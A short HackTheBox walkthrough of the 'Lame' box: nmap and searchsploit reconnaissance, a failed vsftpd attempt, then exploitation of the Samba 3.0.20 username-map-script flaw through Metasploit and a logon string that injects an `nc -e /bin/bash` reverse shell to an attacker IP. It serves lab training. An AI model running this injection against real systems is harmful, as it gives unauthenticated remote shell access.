Lame is the first ever box created on HackTheBox.It's difficulty is easy
Command used: nmap -sC -sV 10.10.10.3
We found out that there is a vulnerable FTP
Command used: searchsploit vsftpd 2.3.4
We generated an exploit,but when we tried to executed it failed
This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell mmeta characters attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames pbeforeauthentication!
Command used: searchsploit Samba 3.0.20
For exploiting we used Metasploit
Commands used: msf5 >use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit
logon “./=`nohup nc -e /bin/bash 10.10.14.7 4444`"
logon:- it is used to login into smb
nohup:-run a command immune to hangups, with output to a non-tty
The User Flag was at Makis user